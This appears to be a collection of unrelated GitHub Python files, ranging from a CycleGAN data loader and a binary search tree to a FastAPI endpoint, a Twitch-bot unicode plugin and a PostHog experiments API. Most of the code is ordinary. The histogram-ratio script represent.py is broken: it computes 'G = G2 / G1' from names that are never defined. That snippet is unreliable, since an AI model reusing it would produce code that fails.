os\r\nimport imageio\r\nimport numpy as np\r\nfrom skimage.transform import resize\r\nimport tensorflow as tf\r\nfrom tensorflow.keras.initializers import RandomNormal\r\nfrom tensorflow.keras.layers import Conv2D, Activation, Concatenate\r\n# from keras_contrib.layers.normalization.instancenormalization import InstanceNormalization\r\nimport matplotlib.pyplot as plt\r\n\r\nclass InstanceNormalization(tf.keras.layers.Layer):\r\n # Initialization of Objects\r\n def __init__(self, epsilon=1e-5):\r\n # calling parent's init\r\n super(InstanceNormalization, self).__init__()\r\n self.epsilon = epsilon\r\n\r\n def build(self, input_shape):\r\n self.scale = self.add_weight(\r\n name='scale',\r\n shape=input_shape[-1:],\r\n initializer=tf.random_normal_initializer(1., 0.02),\r\n trainable=True)\r\n self.offset = self.add_weight(\r\n name='offset',\r\n shape=input_shape[-1:],\r\n initializer='zeros',\r\n trainable=True)\r\n\r\n def call(self, x):\r\n # Compute Mean and Variance, Axes=[1,2] ensures Instance Normalization\r\n mean, variance = tf.nn.moments(x, axes=[1, 2], keepdims=True)\r\n inv = tf.math.rsqrt(variance + self.epsilon)\r\n normalized = (x - mean) * inv\r\n return self.scale * normalized + self.offset\r\n\r\nclass DataUtils:\r\n def __init__(self, sourcePath, resize):\r\n '''\r\n\r\n :param sourcePath: File path to data source\r\n '''\r\n self.data = None\r\n self.sourcePath = sourcePath\r\n self.resize = resize\r\n self.imageSize = None\r\n\r\n self.prepareData()\r\n\r\n def prepareData(self):\r\n self.readFiles()\r\n self.dataPreprocess()\r\n\r\n def readFiles(self):\r\n '''\r\n function to read the data files from the path specified\r\n :return: the list of data elements in the form of numpy array\r\n '''\r\n\r\n # check if the path is valid or not\r\n if os.path.isdir(self.sourcePath):\r\n self.data = [imageio.imread(os.path.join(self.sourcePath, f)) for f in os.listdir(self.sourcePath)\r\n if f.endswith(('.jpeg', '.jpg', '.png'))]\r\n\r\n self.imageSize = self.data[-1].shape\r\n\r\n if len(self.imageSize) != len(self.resize):\r\n raise Exception(\"Size mismatch!!\")\r\n\r\n else:\r\n raise Exception(\"Path Invalid\")\r\n\r\n def dataPreprocess(self):\r\n # normalize the data between -1 to +1\r\n normalized_data = (np.asarray(self.data, dtype=np.float32) / 127.5) - 1\r\n\r\n if len(self.imageSize) == 2:\r\n self.resize = (self.resize[0], self.resize[1], 1)\r\n self.imageSize = (self.imageSize[0], self.imageSize[1], 1)\r\n normalized_data.reshape((normalized_data.shape[0],self.imageSize[0],self.imageSize[1], self.imageSize[2]))\r\n\r\n\r\n final_shape = (normalized_data.shape[0], self.resize[0], self.resize[1], self.resize[2])\r\n\r\n self.data = np.zeros(final_shape, dtype=np.float32)\r\n for index, img in enumerate(normalized_data):\r\n self.data[index, :, :,:] = resize(img, self.resize)\r\n\r\n\r\n def get_data(self, batch_size):\r\n # batch and shuffle the data\r\n return tf.data.Dataset.from_tensor_slices(self.data).shuffle(self.data.shape[0], seed=42).batch(batch_size)\r\n\r\n\r\n\r\ndef resnet_block(n_filters, input_layer):\r\n # weight initialization\r\n init = RandomNormal(stddev=0.02)\r\n # first layer convolutional layer\r\n g = Conv2D(n_filters, (3, 3), padding='same', kernel_initializer=init)(input_layer)\r\n g = InstanceNormalization()(g)\r\n g = Activation('relu')(g)\r\n # second convolutional layer\r\n g = Conv2D(n_filters, (3, 3), padding='same', kernel_initializer=init)(g)\r\n g = InstanceNormalization()(g)\r\n # concatenate merge channel-wise with input layer\r\n 
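# stacking (rather than adding) the skip connection keeps both the original\r\n    # and the transformed features, growing the channel count of the block output\r\n    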
g = Concatenate()([g, input_layer])\r\n    return g\r\n","repo_name":"BharathSD/CycleGAN-For-MRI","sub_path":"Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":3916,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"}
{"seq_id":"36430682145","text":"def divisors(num):\n\n    try:\n\n        if num < 1:\n            raise ValueError('ERROR! The number must be positive')\n        \n        if type(num) is not int:\n            raise TypeError('ERROR! The number must be an integer')\n\n    except ValueError as ve:\n\n        print(ve)\n    \n    except TypeError as te:\n\n        print(te)\n\n    else:\n        divisors = [i for i in range(1, num + 1) if num % i == 0]\n        return divisors\n\n\ndef run():\n    try:\n\n        num = int(input('Enter a number: '))\n        num_divisors = divisors(num)\n        if num_divisors is not None:\n            print(num_divisors)\n\n    except ValueError as ve:\n\n        print('ERROR! You must enter a number')\n\n    finally:\n        print('The program finished')\n\n\nif __name__ == '__main__':\n    run()","repo_name":"fraboto/Data-Science-Study","sub_path":"InterPython/try_except.py","file_name":"try_except.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"18090052265","text":"#!/usr/bin/env python\nimport numpy as np\nimport pyfits\nimport pdb\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom mpltools import style\nstyle.use('ggplot')\n\n\n\"\"\"\nSimple routine for visualizing how representative a training set is of\nits testing set. This is useful for supervised machine learning methods\nthat rely on having a representative training set for accurate model\nprediction. Each routine takes two column names and two pandas\ndataframes containing the training and testing data.\n\nExample:\n\nimport represent\nrepresent.hists(\"Elevation\", \"Rainfall\", train, test)\n\"\"\"\n\n\ndef hists(var1, var2, train, test):\n\n    \"\"\"\n    Plot normalized training/testing sets versus var1 and var2\n    \"\"\"\n\n    fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(15, 15))\n    ax1.set_title('Testing Set')\n    ax1.set_xlabel(var1)\n    ax1.set_ylabel(var2)\n    ax1.set_frame_on(True)\n\n    ax2.set_title('Training Set')\n    ax2.set_xlabel(var1)\n    ax2.set_ylabel(var2)\n    ax2.set_frame_on(True)\n\n    min1 = np.min(np.array([np.min(test[var1]), np.min(train[var1])]))\n    max1 = np.max(np.array([np.max(test[var1]), np.max(train[var1])]))\n    min2 = np.min(np.array([np.min(test[var2]), np.min(train[var2])]))\n    max2 = np.max(np.array([np.max(test[var2]), np.max(train[var2])]))\n\n    H1, xedges1, yedges1, img1 = plt.hist2d(test[var1], test[var2],\n            bins=100, range=np.array([(min1, max1), (min2, max2)]),\n            cmap=plt.cm.jet, normed=True)\n    extent = [yedges1[0], yedges1[-1], xedges1[0], xedges1[-1]]\n    H2, xedges2, yedges2, img2 = plt.hist2d(train[var1], 
train[var2],\n bins=100, cmap=plt.cm.jet)\n G = G2 / G1\n plt.close('all')\n\n fig, ax = plt.subplots(1, 1)\n extent = [yedges1[0], yedges1[-1], xedges1[0], xedges1[-1]]\n im1 = ax.imshow(np.rot90(G), cmap=plt.cm.jet, extent=extent)\n fig.colorbar(im1, ax=ax)\n ax.set_title('Ratio of Train/Test Densities')\n ax.set_xlabel(var1)\n ax.set_ylabel(var2)\n ax.set_frame_on(True)\n plt.show()\n plt.savefig(var1 + '_v_' + var2 + '_ratio.png')\n","repo_name":"redshiftzero/represent","sub_path":"represent.py","file_name":"represent.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"18304421051","text":"import cv2 as cv\nimport numpy as np\n\nimg=cv.imread('Photos/cats.jpg')\ncv.imshow('Cats',img)\n\ngray=cv.cvtColor(img,cv.COLOR_BGR2GRAY)\ncv.imshow('Gray Image',gray)\n\n#Simple Thresholding\nthreshold,thresh=cv.threshold(gray,150,255,cv.THRESH_BINARY)\ncv.imshow('Simple Thresholded Image',thresh)\n\nthreshold,thresh_inv=cv.threshold(gray,150,255,cv.THRESH_BINARY_INV)\ncv.imshow('Simple Inverse Thresholded Image',thresh_inv)\n\n#Adaptive thresholding-->essentially computed optimal threshold value on the basis of the mean\nadaptive_thresh=cv.adaptiveThreshold(gray,255,cv.ADAPTIVE_THRESH_MEAN_C,cv.THRESH_BINARY,11,9)\ncv.imshow('Adaptive Thresholded Image',adaptive_thresh)\n\nadaptive_thresh_inv=cv.adaptiveThreshold(gray,255,cv.ADAPTIVE_THRESH_MEAN_C,cv.THRESH_BINARY_INV,11,9)\ncv.imshow('Inverse Adaptive Thresholded Image',adaptive_thresh_inv)\n\ncv.waitKey(0)","repo_name":"SHAHYASHNILESH/OpenCV-","sub_path":"thresh.py","file_name":"thresh.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19628479399","text":"from http import HTTPStatus\nfrom typing import List\n\nfrom fastapi import APIRouter, Depends, HTTPException\nfrom opentelemetry import trace\nfrom pydantic import BaseModel\nfrom sqlalchemy import update\nfrom sqlalchemy.ext.asyncio import AsyncSession\n\nfrom api.permissions import Role, requires_role\nfrom common.database import Application, ApplicationStatus, with_db\nfrom common.tasks import broadcast\n\nrouter = APIRouter()\ntracer = trace.get_tracer(__name__)\n\n\nclass BulkSetStatus(BaseModel):\n status: ApplicationStatus\n ids: List[int]\n\n\n@router.put(\n \"/status\",\n status_code=HTTPStatus.NO_CONTENT,\n name=\"Bulk update application status\",\n dependencies=[Depends(requires_role(Role.Organizer))],\n)\nasync def bulk_set_status(params: BulkSetStatus, db: AsyncSession = Depends(with_db)):\n \"\"\"\n Set the status for a number of participant applications\n \"\"\"\n\n if params.status == ApplicationStatus.PENDING:\n raise HTTPException(\n status_code=HTTPStatus.BAD_REQUEST,\n detail=f\"application status cannot be set to '{params.status}'\",\n )\n\n statement = (\n update(Application)\n .where(Application.participant_id.in_(params.ids)) # type: ignore\n .where(Application.status == ApplicationStatus.PENDING)\n .values(status=params.status)\n )\n await db.execute(statement)\n await db.commit()\n\n for id in params.ids:\n await broadcast(\"registration\", params.status.value, participant_id=id)\n","repo_name":"WaffleHacks/application-portal","sub_path":"api/registration/bulk.py","file_name":"bulk.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"15947967606","text":"def 
print_board():\n for r in T:\n print(r)\n\n\ndef func(x, y, cnt):\n T[x][y] = cnt\n if cnt == target_cnt:\n return True\n else:\n for v in vectors:\n _x = x + v[0]\n _y = y + v[1]\n if 0 <= _x and _x < N and 0 <= _y and _y < N:\n if T[_x][_y] == 0:\n if func(_x, _y, cnt+1):\n return True\n\n T[x][y] = 0\n return False\n\n\nN = int(input())\nT = [[0 for _ in range(N)] for _ in range(N)]\ntarget_cnt = N*N\nvectors = ((-2, 1), (-1, 2), (1, 2), (2, 1), (2, -1), (1, -2), (-1, -2), (-2, -1))\n\nfor x in range(N):\n for y in range(N):\n if func(x, y, 1):\n print_board()\n exit()\n\nprint('no solution')\n","repo_name":"proman3419/AGH-WIET-INF-WDI-2020","sub_path":"6/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32003450446","text":"# Name: Randy Shao\n# Student Number: 20100992\n\nclass Node:\n # instance variables\n def __init__(self, value):\n self.value = value\n self.leftChild = None\n self.rightChild = None\n\nclass Tree:\n def __init__(self):\n self.root = None\n self.count = 0\n\n def search(self, x):\n node = self.root\n while node is not None:\n if node.value == x:\n return node.value\n elif node.value > x:\n node = node.leftChild\n else:\n node = node.rightChild\n return None\n\n def searchPath(self, x, pathArray):\n node = self.root\n while node is not None:\n if node.value == x:\n pathArray.append(node.value)\n return pathArray\n elif node.value > x:\n pathArray.append(node.value)\n node = node.leftChild\n else:\n pathArray.append(node.value)\n node = node.rightChild\n return None\n\n def insert(self, x):\n self.count += 1\n self.root = self.recInsert(self.root, x)\n\n def recInsert(self, node, x):\n if node is None:\n self.root = Node(x)\n return self.root\n elif node.value >= x:\n node.leftChild = self.recInsert(node.leftChild, x)\n else:\n node.rightChild = self.recInsert(node.rightChild, x)\n return node\n\n def delete(self, x):\n self.root = self.recDelete(self.root, x)\n\n def recDelete(self, node, x):\n if node is None:\n return node\n else:\n if node.value < x:\n node.rightChild = self.recDelete(node.rightChild, x)\n return node\n elif node.value > x:\n node.leftChild = self.recDelete(node.leftChild, x)\n return node\n else:\n if node.leftChild is None:\n return node.rightChild\n elif node.rightChild is None:\n return node.leftChild\n else:\n tmp = self.fix_left_subtree(node)\n tmp.rightChild = node.rightChild\n return tmp\n\n def fix_left_subtree(self, v):\n temp = v.leftChild # temp is the root of v’s\n\n # left subtree\n if temp.rightChild is None:\n return temp # no fix needed\n else:\n parent = None\n node = temp\n while node.rightChild is not None:\n parent = node\n node = node.rightChild\n parent.rightChild = node.leftChild\n node.leftChild = temp\n return node\n\n def averageDepth(self):\n total = self.calcDepth(self.root, [], 1)\n count = 0\n for i in total:\n count += i\n return count / self.count\n\n def calcDepth(self, node, avgDepth, counter):\n\n if node is None:\n return 0\n else:\n self.calcDepth(node.leftChild, avgDepth, counter + 1)\n avgDepth.append(counter)\n self.calcDepth(node.rightChild, avgDepth, counter + 1)\n return avgDepth\n\n def maxDepth(self, node):\n if node is None:\n return 0\n leftDepth = self.maxDepth(node.leftChild)\n rightDepth = self.maxDepth(node.rightChild)\n\n if leftDepth > rightDepth:\n return leftDepth + 1\n else:\n return rightDepth + 1\n\n def preOrder(self, x):\n if x is None:\n return\n else:\n 
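# pre-order: visit the node itself before recursing into its subtrees\n            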
print(x.value)\n            self.preOrder(x.leftChild)\n            self.preOrder(x.rightChild)\n\nif __name__ == \"__main__\":\n    bst = Tree()\n    nodeArray = [6, 3, 17, 8, 20, 7, 12, 10]\n    for node in nodeArray:\n        bst.insert(node)\n    print(\"Binary Search Tree Values: \")\n    bst.preOrder(bst.root)\n    for node in nodeArray:\n        print(\"Search value: \", bst.search(node))\n    for node in nodeArray:\n        print(\"Search Path: \", bst.searchPath(node, []))\n    print(\"Average Depth: \", bst.averageDepth())\n    print(\"Max Depth: \", bst.maxDepth(bst.root))\n    bst.delete(17)\n    print(\"Updated Binary Search Tree:\")\n    bst.preOrder(bst.root)\n\n\n\n\n\n\n\n\n\n","repo_name":"randyshao/Data-Structures-Algorithms","sub_path":"cisc235_assn3/assn3.py","file_name":"assn3.py","file_ext":"py","file_size_in_byte":4231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"480069436","text":"import sqlite3\nconn = sqlite3.connect('test.db')\nprint('Opened DB successfully')\n\ndef printDB():\n\ta = conn.execute(\"SELECT * FROM Employee\");\n\tfor row in a:\n\t\tprint(row)\n\nconn.execute(\"DROP TABLE IF EXISTS Employee;\")\nconn.execute(''' \n\tCREATE TABLE IF NOT EXISTS Employee(\n\tid INTEGER PRIMARY KEY AUTOINCREMENT,\n\tname TEXT NOT NULL); ''')\n\nprint('Table created successfully')\n\nconn.execute(\"INSERT INTO Employee(name) VALUES('Devang')\");\nconn.execute(\"INSERT INTO Employee(name) VALUES('Nimesh')\");\n\nprintDB()\n\nid, name = input().split()\nid = int(id)\nconn.execute(\"UPDATE Employee SET name = ? WHERE id = ?\", (name, id))\n\nprintDB()\nconn.commit()","repo_name":"devangrajarora/sem-5-labs","sub_path":"AP Lab/Tkinter and SQLite/sqlite.py","file_name":"sqlite.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"34332761838","text":"import typing\nimport unicodedata\n\nimport util_bot\nfrom plugins.utils import arg_parser\n\ntry:\n    import plugin_hastebin\nexcept ImportError:\n    import plugins.plugin_hastebin as plugin_hastebin_module\n\n    plugin_hastebin: plugin_hastebin_module.Plugin\n    exit(1)\ntry:\n    import plugin_chat_cache\nexcept ImportError:\n    import plugins.plugin_chat_cache as plugin_chat_cache_module\n\n    plugin_chat_cache: plugin_chat_cache_module.Plugin\n    exit(1)\n\nNAME = 'unicodedata'\n__meta_data__ = {\n    'name': f'plugin_{NAME}',\n    'commands': []\n}\nlog = util_bot.make_log_function(NAME)\n\n\nclass Plugin(util_bot.Plugin):\n    commands = ['unicode']\n    name = NAME\n    no_reload = False\n\n    def __init__(self, module, source):\n        super().__init__(module, source)\n        self.command_unicode = util_bot.bot.add_command(\n            'unicode',\n            cooldown=util_bot.CommandCooldown(1, 0, 0)  # prevent vip spam and that's it\n        )(self.command_unicode)\n\n    def _explain_char(self, ch, further):\n        try:\n            name = unicodedata.name(ch)\n        except ValueError:\n            name = f'[U+{hex(ord(ch))[2:]}]'\n        if not further:\n            return name + f'({ch})'\n        infos = {\n            'category': unicodedata.category(ch),\n            'direction': unicodedata.bidirectional(ch),\n            'east asian width': unicodedata.east_asian_width(ch)\n        }\n\n        decomposition = unicodedata.decomposition(ch)\n        if decomposition:\n            infos['decomposition'] = decomposition\n\n        try:\n            infos['digit value'] = unicodedata.digit(ch)\n        except ValueError:\n            pass\n        try:\n            infos['decimal value'] = unicodedata.decimal(ch)\n        except ValueError:\n            pass\n        try:\n            infos['numeric value'] = unicodedata.numeric(ch)\n        except ValueError:\n            pass\n        comb = unicodedata.combining(ch)\n        if comb != 
0:\n infos['combining class'] = str(comb)\n\n mirrored = unicodedata.mirrored(ch)\n if mirrored:\n infos['mirrored'] = 'yes'\n if hasattr(unicodedata, 'is_normalized'):\n forms = []\n for form in ('NFC', 'NFD', 'NFKC', 'NFKD'):\n if unicodedata.is_normalized(form, ch):\n forms.append(form)\n if forms:\n infos['normalized'] = f'yes: {\", \".join(forms)}'\n else:\n infos['normalized'] = 'no'\n else:\n infos['normalized'] = 'unavailable'\n\n info = ', '.join([\n f'{k}: {v}'\n for k, v in infos.items()\n ])\n return f'{name}: {ch!r} ({info})'\n\n async def command_unicode(self, msg: util_bot.StandardizedMessage) \\\n -> typing.Union[str, typing.Tuple[util_bot.CommandResult, str]]:\n txt = msg.text.split(' ', 1)\n if len(txt) < 2:\n return (util_bot.CommandResult.OTHER_FAILED,\n f'Usage: unicode [--verbose]')\n try:\n args = arg_parser.parse_args(\n txt[1],\n {\n 'user': str,\n 'verbose': bool,\n arg_parser.POSITIONAL: str,\n },\n strict_escapes=False,\n strict_quotes=False,\n ignore_arg_zero=True,\n defaults={\n 'verbose': False,\n 'user': None\n }\n )\n except arg_parser.ParserError as e:\n return f'@{msg.user}, {e.message}'\n text = ' '.join(map(lambda pair: pair[1], filter(lambda pair: isinstance(pair[0], int), args.items())))\n if args['user']:\n last_messages = plugin_chat_cache.find_messages(\n msg.channel,\n user=args['user'].strip('@,').lower()\n )\n if len(last_messages) == 0 or (args['user'] == msg.user and len(last_messages) < 2):\n return (util_bot.CommandResult.OTHER_FAILED,\n f'@{msg.user}, User has no known recent messages.')\n if args['user'] == msg.user:\n text = last_messages[-2].text\n else:\n text = last_messages[-1].text\n\n explained = [self._explain_char(i, False) for i in text]\n out = ', '.join(explained)\n\n post = False\n why_post = ''\n if len(out) + len(msg.user) + 3 >= 499:\n why_post = 'Message was too long to fit. 
'\n post = True\n if args['verbose']:\n why_post = ''\n post = True\n\n if post:\n # message too long\n slug = await plugin_hastebin.upload('\\n'.join([self._explain_char(ch, True) for ch in text]))\n return (f'@{msg.user}, {why_post}Here is a hastebin: '\n f'{plugin_hastebin.hastebin_addr}{slug}')\n elif len(text) == 1:\n return f'@{msg.user}, {self._explain_char(text[0], True)}'\n else:\n return f'@{msg.user}, {out}'\n","repo_name":"Mm2PL/MmsUtilityBot","sub_path":"plugins/plugin_unicodedata.py","file_name":"plugin_unicodedata.py","file_ext":"py","file_size_in_byte":5046,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"39500805979","text":"from typing import Any, Callable, Optional\n\nfrom django.utils.timezone import now\nfrom rest_framework import serializers, viewsets\nfrom rest_framework.decorators import action\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.request import Request\nfrom rest_framework.response import Response\nfrom statshog.defaults.django import statsd\n\nfrom ee.clickhouse.queries.experiments.funnel_experiment_result import (\n ClickhouseFunnelExperimentResult,\n)\nfrom ee.clickhouse.queries.experiments.secondary_experiment_result import (\n ClickhouseSecondaryExperimentResult,\n)\nfrom ee.clickhouse.queries.experiments.trend_experiment_result import (\n ClickhouseTrendExperimentResult,\n)\nfrom ee.clickhouse.queries.experiments.utils import requires_flag_warning\nfrom posthog.api.feature_flag import FeatureFlagSerializer, MinimalFeatureFlagSerializer\nfrom posthog.api.routing import StructuredViewSetMixin\nfrom posthog.api.shared import UserBasicSerializer\nfrom posthog.caching.insight_cache import update_cached_state\nfrom posthog.clickhouse.query_tagging import tag_queries\nfrom posthog.constants import INSIGHT_TRENDS, AvailableFeature\nfrom posthog.models.experiment import Experiment\nfrom posthog.models.filters.filter import Filter\nfrom posthog.permissions import (\n PremiumFeaturePermission,\n ProjectMembershipNecessaryPermissions,\n TeamMemberAccessPermission,\n)\nfrom posthog.utils import generate_cache_key, get_safe_cache\n\nEXPERIMENT_RESULTS_CACHE_DEFAULT_TTL = 60 * 30 # 30 minutes\n\n\ndef _calculate_experiment_results(experiment: Experiment, refresh: bool = False):\n filter = Filter(experiment.filters, team=experiment.team)\n\n exposure_filter_data = (experiment.parameters or {}).get(\"custom_exposure_filter\")\n exposure_filter = None\n if exposure_filter_data:\n exposure_filter = Filter(data=exposure_filter_data, team=experiment.team)\n\n if filter.insight == INSIGHT_TRENDS:\n calculate_func = lambda: ClickhouseTrendExperimentResult(\n filter,\n experiment.team,\n experiment.feature_flag,\n experiment.start_date,\n experiment.end_date,\n custom_exposure_filter=exposure_filter,\n ).get_results()\n else:\n calculate_func = lambda: ClickhouseFunnelExperimentResult(\n filter,\n experiment.team,\n experiment.feature_flag,\n experiment.start_date,\n experiment.end_date,\n ).get_results()\n\n return _experiment_results_cached(\n experiment,\n \"primary\",\n filter,\n calculate_func,\n refresh=refresh,\n exposure_filter=exposure_filter,\n )\n\n\ndef _calculate_secondary_experiment_results(experiment: Experiment, parsed_id: int, refresh: bool = False):\n filter = Filter(experiment.secondary_metrics[parsed_id][\"filters\"], team=experiment.team)\n\n # TODO: refactor such that ClickhouseSecondaryExperimentResult's 
get_results doesn't return a dict\n calculate_func = lambda: ClickhouseSecondaryExperimentResult(\n filter,\n experiment.team,\n experiment.feature_flag,\n experiment.start_date,\n experiment.end_date,\n ).get_results()[\"result\"]\n\n return _experiment_results_cached(experiment, \"secondary\", filter, calculate_func, refresh=refresh)\n\n\ndef _experiment_results_cached(\n experiment: Experiment,\n results_type: str,\n filter: Filter,\n calculate_func: Callable,\n refresh: bool,\n exposure_filter: Optional[Filter] = None,\n):\n cache_filter = filter.shallow_clone(\n {\n \"date_from\": experiment.start_date,\n \"date_to\": experiment.end_date if experiment.end_date else None,\n }\n )\n\n exposure_suffix = \"\" if not exposure_filter else f\"_{exposure_filter.toJSON()}\"\n\n cache_key = generate_cache_key(\n f\"experiment_{results_type}_{cache_filter.toJSON()}_{experiment.team.pk}_{experiment.pk}{exposure_suffix}\"\n )\n\n tag_queries(cache_key=cache_key)\n\n cached_result_package = get_safe_cache(cache_key)\n\n if cached_result_package and cached_result_package.get(\"result\") and not refresh:\n cached_result_package[\"is_cached\"] = True\n statsd.incr(\n \"posthog_cached_function_cache_hit\",\n tags={\"route\": \"/projects/:id/experiments/:experiment_id/results\"},\n )\n return cached_result_package\n\n statsd.incr(\n \"posthog_cached_function_cache_miss\",\n tags={\"route\": \"/projects/:id/experiments/:experiment_id/results\"},\n )\n\n result = calculate_func()\n\n timestamp = now()\n fresh_result_package = {\"result\": result, \"last_refresh\": now(), \"is_cached\": False}\n\n update_cached_state(\n experiment.team.pk,\n cache_key,\n timestamp,\n fresh_result_package,\n ttl=EXPERIMENT_RESULTS_CACHE_DEFAULT_TTL,\n )\n\n return fresh_result_package\n\n\nclass ExperimentSerializer(serializers.ModelSerializer):\n feature_flag_key = serializers.CharField(source=\"get_feature_flag_key\")\n created_by = UserBasicSerializer(read_only=True)\n feature_flag = MinimalFeatureFlagSerializer(read_only=True)\n\n class Meta:\n model = Experiment\n fields = [\n \"id\",\n \"name\",\n \"description\",\n \"start_date\",\n \"end_date\",\n \"feature_flag_key\",\n \"feature_flag\",\n \"parameters\",\n \"secondary_metrics\",\n \"filters\",\n \"archived\",\n \"created_by\",\n \"created_at\",\n \"updated_at\",\n ]\n read_only_fields = [\n \"id\",\n \"created_by\",\n \"created_at\",\n \"updated_at\",\n \"feature_flag\",\n ]\n\n def validate_parameters(self, value):\n if not value:\n return value\n\n variants = value.get(\"feature_flag_variants\", [])\n\n if len(variants) >= 11:\n raise ValidationError(\"Feature flag variants must be less than 11\")\n elif len(variants) > 0:\n if \"control\" not in [variant[\"key\"] for variant in variants]:\n raise ValidationError(\"Feature flag variants must contain a control variant\")\n\n return value\n\n def create(self, validated_data: dict, *args: Any, **kwargs: Any) -> Experiment:\n if not validated_data.get(\"filters\"):\n raise ValidationError(\"Filters are required to create an Experiment\")\n\n variants = []\n aggregation_group_type_index = None\n if validated_data[\"parameters\"]:\n variants = validated_data[\"parameters\"].get(\"feature_flag_variants\", [])\n aggregation_group_type_index = validated_data[\"parameters\"].get(\"aggregation_group_type_index\")\n\n request = self.context[\"request\"]\n validated_data[\"created_by\"] = request.user\n\n feature_flag_key = validated_data.pop(\"get_feature_flag_key\")\n\n is_draft = \"start_date\" not in validated_data or 
validated_data[\"start_date\"] is None\n\n properties = validated_data[\"filters\"].get(\"properties\", [])\n\n if properties:\n raise ValidationError(\"Experiments do not support global filter properties\")\n\n default_variants = [\n {\"key\": \"control\", \"name\": \"Control Group\", \"rollout_percentage\": 50},\n {\"key\": \"test\", \"name\": \"Test Variant\", \"rollout_percentage\": 50},\n ]\n\n filters = {\n \"groups\": [{\"properties\": properties, \"rollout_percentage\": None}],\n \"multivariate\": {\"variants\": variants or default_variants},\n \"aggregation_group_type_index\": aggregation_group_type_index,\n }\n\n feature_flag_serializer = FeatureFlagSerializer(\n data={\n \"key\": feature_flag_key,\n \"name\": f'Feature Flag for Experiment {validated_data[\"name\"]}',\n \"filters\": filters,\n \"active\": not is_draft,\n },\n context=self.context,\n )\n\n feature_flag_serializer.is_valid(raise_exception=True)\n feature_flag = feature_flag_serializer.save()\n\n experiment = Experiment.objects.create(\n team_id=self.context[\"team_id\"], feature_flag=feature_flag, **validated_data\n )\n return experiment\n\n def update(self, instance: Experiment, validated_data: dict, *args: Any, **kwargs: Any) -> Experiment:\n has_start_date = validated_data.get(\"start_date\") is not None\n feature_flag = instance.feature_flag\n\n expected_keys = {\n \"name\",\n \"description\",\n \"start_date\",\n \"end_date\",\n \"filters\",\n \"parameters\",\n \"archived\",\n \"secondary_metrics\",\n }\n given_keys = set(validated_data.keys())\n extra_keys = given_keys - expected_keys\n\n if feature_flag.key == validated_data.get(\"get_feature_flag_key\"):\n extra_keys.remove(\"get_feature_flag_key\")\n\n if extra_keys:\n raise ValidationError(f\"Can't update keys: {', '.join(sorted(extra_keys))} on Experiment\")\n\n if \"feature_flag_variants\" in validated_data.get(\"parameters\", {}):\n if len(validated_data[\"parameters\"][\"feature_flag_variants\"]) != len(feature_flag.variants):\n raise ValidationError(\"Can't update feature_flag_variants on Experiment\")\n\n for variant in validated_data[\"parameters\"][\"feature_flag_variants\"]:\n if (\n len([ff_variant for ff_variant in feature_flag.variants if ff_variant[\"key\"] == variant[\"key\"]])\n != 1\n ):\n raise ValidationError(\"Can't update feature_flag_variants on Experiment\")\n\n properties = validated_data.get(\"filters\", {}).get(\"properties\")\n if properties:\n raise ValidationError(\"Experiments do not support global filter properties\")\n\n if instance.is_draft and has_start_date:\n feature_flag.active = True\n feature_flag.save()\n return super().update(instance, validated_data)\n else:\n # Not a draft, doesn't have start date\n # Or draft without start date\n return super().update(instance, validated_data)\n\n\nclass ClickhouseExperimentsViewSet(StructuredViewSetMixin, viewsets.ModelViewSet):\n serializer_class = ExperimentSerializer\n queryset = Experiment.objects.all()\n permission_classes = [\n IsAuthenticated,\n PremiumFeaturePermission,\n ProjectMembershipNecessaryPermissions,\n TeamMemberAccessPermission,\n ]\n premium_feature = AvailableFeature.EXPERIMENTATION\n ordering = \"-created_at\"\n\n def get_queryset(self):\n return super().get_queryset().prefetch_related(\"feature_flag\", \"created_by\")\n\n # ******************************************\n # /projects/:id/experiments/:experiment_id/results\n #\n # Returns current results of an experiment, and graphs\n # 1. Probability of success\n # 2. 
Funnel breakdown graph to display\n    # ******************************************\n    @action(methods=[\"GET\"], detail=True)\n    def results(self, request: Request, *args: Any, **kwargs: Any) -> Response:\n        experiment: Experiment = self.get_object()\n\n        refresh = request.query_params.get(\"refresh\") is not None\n\n        if not experiment.filters:\n            raise ValidationError(\"Experiment has no target metric\")\n\n        result = _calculate_experiment_results(experiment, refresh)\n\n        return Response(result)\n\n    # ******************************************\n    # /projects/:id/experiments/:experiment_id/secondary_results?id=\n    #\n    # Returns values for secondary experiment metrics, broken down by variants\n    # ******************************************\n    @action(methods=[\"GET\"], detail=True)\n    def secondary_results(self, request: Request, *args: Any, **kwargs: Any) -> Response:\n        experiment: Experiment = self.get_object()\n\n        refresh = request.query_params.get(\"refresh\") is not None\n\n        if not experiment.secondary_metrics:\n            raise ValidationError(\"Experiment has no secondary metrics\")\n\n        metric_id = request.query_params.get(\"id\")\n\n        if not metric_id:\n            raise ValidationError(\"Secondary metric id is required\")\n\n        try:\n            parsed_id = int(metric_id)\n        except ValueError:\n            raise ValidationError(\"Secondary metric id must be an integer\")\n\n        # parsed_id is used as a list index, so id == len(...) is also out of range\n        if parsed_id >= len(experiment.secondary_metrics):\n            raise ValidationError(\"Invalid metric ID\")\n\n        result = _calculate_secondary_experiment_results(experiment, parsed_id, refresh)\n\n        return Response(result)\n\n    # ******************************************\n    # /projects/:id/experiments/requires_flag_implementation\n    #\n    # Returns current results of an experiment, and graphs\n    # 1. Probability of success\n    # 